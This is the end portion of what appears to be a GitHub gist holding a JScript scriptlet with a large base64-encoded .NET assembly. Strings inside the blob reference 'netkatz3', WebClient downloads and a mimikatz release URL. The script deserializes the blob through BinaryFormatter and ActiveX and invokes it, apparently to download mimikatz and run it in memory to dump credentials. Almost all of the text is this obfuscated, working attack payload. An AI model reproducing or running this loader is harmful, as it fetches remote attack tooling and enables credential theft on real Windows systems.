"d01pbGxpc2Vjb25kcwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNz"+
"aW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9uAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2Vydmlj"+
"ZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0"+
"dHJpYnV0ZQBuZXRrYXR6MwBJbnRQdHIAVG9JbnQ2NABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2Vy"+
"dmljZXMARGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyLmRsbABNaWNyb3NvZnQuV2luMzIuU2Fm"+
"ZUhhbmRsZXMAU2FmZUZpbGVIYW5kbGUARmlsZVN0cmVhbQBGaWxlQWNjZXNzAFN5c3RlbS5UZXh0"+
"AEVuY29kaW5nAEdldEVuY29kaW5nAFN0cmVhbVdyaXRlcgBzZXRfQXV0b0ZsdXNoAENvbnNvbGUA"+
"VGV4dFdyaXRlcgBTZXRPdXQAQnl0ZQBNZW1vcnlTdHJlYW0AV3JpdGUAUmVhZABUb0FycmF5AElE"+
"aXNwb3NhYmxlAERpc3Bvc2UAU3lzdGVtLk5ldABXZWJDbGllbnQARG93bmxvYWREYXRhAFN5c3Rl"+
"bS5JTy5Db21wcmVzc2lvbgBaaXBBcmNoaXZlAFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2Rl"+
"bABSZWFkT25seUNvbGxlY3Rpb25gMQBaaXBBcmNoaXZlRW50cnkAZ2V0X0VudHJpZXMAU3lzdGVt"+
"LkNvbGxlY3Rpb25zLkdlbmVyaWMASUVudW1lcmF0b3JgMQBHZXRFbnVtZXJhdG9yAGdldF9DdXJy"+
"ZW50AGdldF9GdWxsTmFtZQBTdHJpbmcAb3BfRXF1YWxpdHkAZ2V0X1NpemUAT3BlbgBTeXN0ZW0u"+
"Q29sbGVjdGlvbnMASUVudW1lcmF0b3IATW92ZU5leHQARXhjZXB0aW9uAGdldF9Jbm5lckV4Y2Vw"+
"dGlvbgBaZXJvAE1hcnNoYWwAQ29weQBUb0ludDMyAFR5cGUAUnVudGltZVR5cGVIYW5kbGUAR2V0"+
"VHlwZUZyb21IYW5kbGUAUHRyVG9TdHJ1Y3R1cmUAU2l6ZU9mAFJlYWRJbnQxNgBSZWFkSW50MzIA"+
"V3JpdGVJbnQzMgBSZWFkSW50NjQAV3JpdGVJbnQ2NABQdHJUb1N0cmluZ0Fuc2kAb3BfRXhwbGlj"+
"aXQAQWRkAEZpbGVNb2RlAFNlZWtPcmlnaW4AU2VlawBSZWFkVUludDMyAEZpbGUAUmVhZEFsbEJ5"+
"dGVzAFJlYWRCeXRlcwBHQ0hhbmRsZQBHQ0hhbmRsZVR5cGUAQWxsb2MAQWRkck9mUGlubmVkT2Jq"+
"ZWN0AEZyZWUAU3RydWN0TGF5b3V0QXR0cmlidXRlAExheW91dEtpbmQARmllbGRPZmZzZXRBdHRy"+
"aWJ1dGUATWFyc2hhbEFzQXR0cmlidXRlAFVubWFuYWdlZFR5cGUARmxhZ3NBdHRyaWJ1dGUAa2Vy"+
"bmVsMzIALmNjdG9yAFN5c3RlbS5TZWN1cml0eQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAAAA"+
"D0MATwBOAE8AVQBUACQAAIC1aAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBn"+
"AGUAbgB0AGkAbABrAGkAdwBpAC8AbQBpAG0AaQBrAGEAdAB6AC8AcgBlAGwAZQBhAHMAZQBzAC8A"+
"ZABvAHcAbgBsAG8AYQBkAC8AMgAuADEALgAxAC0AMgAwADEANwAxADIAMgAwAC8AbQBpAG0AaQBr"+
"AGEAdAB6AF8AdAByAHUAbgBrAC4AegBpAHAAASF4ADYANAAvAG0AaQBtAGkAawBhAHQAegAuAGUA"+
"eABlAAAlVwBpAG4AMwAyAC8AbQBpAG0AaQBrAGEAdAB6AC4AZQB4AGUAAAEAAACHWWlLXF4cQYJP"+
"ySMsgyENAAi3elxWGTTgiQIGCAS1AQAAAgYJBAAAAEAEAgAAAAQDAAAABQACGBgIAgYYAwAACAoA"+
"BxgOCQkJCQkJAwAAAQMgAAEGAAEdBRIRBAABAQ4DBhEQAwYRIAMGERgDBhEcBAYdESQDBh0FBCAB"+
"AQ4FIAEBHQUHEAEBHgASFQMgAAIEIAARIAQgABEYBCAAERwFIAAdESQEIAAdBQMoAAIEKAARIAQo"+
"ABEYBCgAERwFKAAdESQEKAAdBQIGBwIGBQMGERQCBgsDBh0DAwYRLAMgAA4DKAAOBAAAAAAHAAQY"+
"GAkJCQQAARgOBQACGBgOCQAGGBgJGBgJGAUAAgkYCQUgAQERHQQgAQEIAyAACgQgAQEKBAcCGBgF"+
"IAIBGAIHIAIBEjEROQUAARI9CAcgAgESERI9BCABAQIFAAEBEkkLBwUYEjESNRI9EkEHIAMBHQUI"+
"CAcgAwgdBQgICgcFHQUSUQgdBQIFIAEdBQ4FIAEBEhEIIAAVEmEBEmUGFRJhARJlCCAAFRJpARMA"+
"BhUSaQESZQQgABMABQACAg4OBCAAEhEEIAASdQgABAEdBQgYCAMgAAgHAAESfRGAgQYAAhwYEn0F"+
"AAEIEn0FAAIGGAgEAAEIGAUAAgEYCAQAAQoYBQACARgKBAABDhhCBzASWR0FHQUSERIREl0SZRJ1"+
"EgwIGBgKGBE0CBgIGBE0GBgYBwcHCAoYGAgYCQgYCBgYDhgIGA4YGBUSaQESZQIHCSADAQ4RgIUR"+
"OQQKAREQByACCgoRgIkDIAAJBAoBESAECgERGAQKAREcBAoBESQFAAEdBQ4JBwUSNRIVCQgCCQcF"+
"ElESFQkIAgIeAAUgAR0FCAkAAhGAkRwRgJUDIAAYCwcEHQURgJEeAB4ABAcCBwIEBwERIAQHAREY"+
"BAcBERwFBwEdESQEBwEdBQYgAQERgJ0GIAEBEYCpAh4IBSABAR0DAwcBDgQBAAAACAEACAAAAAAA"+
"HgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAYCeLgGAhFN5c3RlbS5TZWN1cml0eS5QZXJt"+
"aXNzaW9ucy5TZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUsIG1zY29ybGliLCBWZXJzaW9uPTQu"+
"MC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORUB"+
"VAIQU2tpcFZlcmlmaWNhdGlvbgEAAHRMAAAAAAAAAAAAAI5MAAAAIAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAACATAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAA"+
"AAAAAAAAAAEAAAAAAEgAAABYYAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8A"+
"TgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAA"+
"AAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4A"+
"cwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAA"+
"AIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkA"+
"bwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAw"+
"AAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABuAGUAdABrAGEAdAB6ADMALgBkAGwA"+
"bAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBp"+
"AGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABuAGUAdABrAGEAdAB6ADMALgBkAGwAbAAAAAAA"+
"NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAAB"+
"AEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AEAAAAwAAACgPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB"+
"DQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBM"+
"b2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'TestClass';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var d = fmt.Deserialize_2(stm);
al.Add(undefined);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
} catch (e) {
debug(e.message);
}
}
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.